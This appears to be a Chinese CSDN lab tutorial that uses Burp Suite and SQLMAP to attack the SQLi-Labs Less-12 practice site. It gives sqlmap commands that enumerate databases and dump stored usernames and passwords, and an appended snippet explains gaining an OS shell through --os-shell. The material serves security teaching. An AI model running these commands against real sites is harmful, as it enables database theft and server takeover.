SQLMAP进阶使用 --technique -v

实验原理

使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。
注入时,可以利用--technique参数指定SQLMAP使用的探测技术:B表示布尔盲注,T表示时间盲注(延迟注入),E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情。

1.访问SQLi-Labs网站

访问Less-12

http://192.168.5.116/sqli-labs/Less-12/

2.利用Burpsuite工具抓包

1)启动Burpsuite并设置代理服务端口

https://img-blog.csdnimg.cn/f547110f81494cb19cc6741ed79f2131.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

2)设置Firefox代理

https://img-blog.csdnimg.cn/8d1c61438782446f9fb223fcec1677e3.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_18,color_FFFFFF,t_70,g_se,x_16

 注意:端口要一致

3)开启 Burpsuite的代理拦截功能
https://img-blog.csdnimg.cn/86e4e8ba6f724c3ab32757cb9845ffbe.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4)利用Burpsuite工具拦截HTTP请求包

输入用户名admin,密码任意,点击Submit登录,此时Burpsuite会拦截到HTTP请求包

 5)将请求包内容拷贝至D:\1.txt中

3.启动SQLMAP

进入sqlmap目录,在搜索框输入cmd,并回车

https://img-blog.csdnimg.cn/ca82c496933e43629ad82f5169db5c08.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAWl9sMTIz,size_20,color_FFFFFF,t_70,g_se,x_16

 4.寻找注入点

python sqlmap.py -r D:\1.txt --technique "U" -v 3

其中,--technique"U"表示使用基于联合查询的技术;-v表示显示等级,当取值大于等于3时,将显示SQLMAP检测过程中所使用的payload详情。

 

 检测结果

5.获取数据库的库名 

 1)获取所有数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --dbs

 2)获取当前数据库的库名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 --current-db

 6.获取security数据库中的所有表名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security --tables

其中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users --columns

 

8.获取users表id,username和password字段的全部值

python sqlmap.py -r D:\1.txt --technique "U" -v 3 -D security -T users -C id,username,password --dump

 

  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap是一款用于自动化SQL注入和数据库接管的工具。使用--os-shell参数可以在受攻击的目标上执行操作系统命令。首先,用户需要具备dba权限才能使用--os-shell参数\[1\]。然后,可以通过以下命令来攻击目标并获取操作系统shell: ``` sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --os-shell ``` 在使用--os-shell参数之前,需要确保Mysql数据库的secure_file_priv参数允许导入导出操作\[2\]。如果secure_file_priv参数的值为null,表示不允许导入导出操作,需要管理员修改该参数的值。在Mysql 5.7版本以上,默认情况下secure_file_priv参数的值为null,因此需要管理员修改该参数的值才能使用--os-shell参数\[2\]。 使用--os-shell参数的原理是通过使用into outfile函数上传两个php文件,一个用于上传文件,另一个用于执行系统命令并返回结果\[3\]。这样就可以在目标系统上执行操作系统命令。 请注意,使用sqlmap进行攻击是非法的,仅用于安全测试和研究目的。 #### 引用[.reference_title] - *1* *2* *3* [sqlmap —— os-shell参数分析](https://blog.csdn.net/qq_43531669/article/details/120630864)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值